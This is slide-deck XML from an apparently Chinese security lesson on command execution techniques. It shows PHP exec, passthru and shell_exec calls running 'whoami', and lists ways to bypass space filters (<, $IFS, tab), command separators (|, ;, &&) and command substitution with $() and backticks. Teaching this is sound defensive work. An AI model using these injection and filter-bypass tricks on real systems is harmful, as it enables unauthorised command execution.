                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passthru:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_exec:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800"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0422602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命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>技巧</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525657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>空格过滤</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7FA427-C2EC-444F-B15E-B533B106DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1691640"/>
            <a:ext cx="2133600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t> 符号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48062B33-228F-FA40-AAD4-E8B593F16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 y="2242619"/>
            <a:ext cx="5791200" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1636CF3F-8A49-D146-925E-DFF9C4A527E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3136081"/>
            <a:ext cx="2133600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>$IFS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t> 符号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0FD7AC-419C-5747-86A6-851BF6510D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036319" y="5181289"/>
            <a:ext cx="3672841" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>制表符</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029A0EF6-BF22-CB4A-B9B1-8B512BD4D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39" y="5767774"/>
            <a:ext cx="5499100" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84AF43D-A83D-AC45-8799-6C385EF619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840" y="3584564"/>
            <a:ext cx="6070600" cy="660400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA6FC54-9B50-C648-9EB2-8FD13710B0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840" y="4432105"/>
            <a:ext cx="5880100" cy="673100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130977927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命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>技巧</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525657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令分隔符</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7FA427-C2EC-444F-B15E-B533B106DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1691640"/>
            <a:ext cx="2133600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t> 符号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1636CF3F-8A49-D146-925E-DFF9C4A527E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3136081"/>
            <a:ext cx="2133600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t> 符号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0FD7AC-419C-5747-86A6-851BF6510D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5050021"/>
            <a:ext cx="3672841" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t> 符号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3651BDB-98E6-684C-9ED1-18557F345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 y="2343766"/>
            <a:ext cx="5778500" cy="660400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F1F040F-00AC-4D4A-AE85-9B08C96B9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 y="3722566"/>
            <a:ext cx="6146800" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBBB8F92-1E70-064F-BD6A-D7BD0A7ED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840" y="5671820"/>
            <a:ext cx="6794500" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238523388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命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>技巧</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525657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>``</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7FA427-C2EC-444F-B15E-B533B106DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1691640"/>
            <a:ext cx="6146800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>$()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>``</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>会将字符串当命令执行，并返回结果</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A469CE78-AF59-EB4B-B4DB-42D00022F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 y="2399066"/>
            <a:ext cx="9097486" cy="801333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F46CD5D-A2F6-744C-9241-242583FF7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39" y="3810686"/>
            <a:ext cx="9097487" cy="952063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412307982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命令执行</a:t>
            </a:r>
